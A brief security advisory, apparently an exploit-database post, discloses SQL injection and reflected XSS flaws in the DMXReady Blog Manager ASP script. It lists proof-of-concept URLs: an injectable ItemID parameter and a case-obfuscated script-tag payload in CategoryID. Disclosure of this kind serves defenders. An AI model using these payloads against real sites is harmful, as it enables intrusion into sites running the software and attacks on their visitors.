DMXReady Blog Manager (SQL/XSS)

[pouya.s3rver () gmail com]

#########################################################
---------------------------------------------------------
Portal Name: DMXReady Blog Manager (SQL/XSS)
Vendor : http://www.galaxyscripts.com
Author : Pouya_Server , Pouya.s3rver () Gmail com
Aria-Security.Net
Vulnerability : (SQL/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view
----------

[XSS]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer
---------------------------------
Demo:
http://www.demo.dmxready.com/applications/WebBlogManager/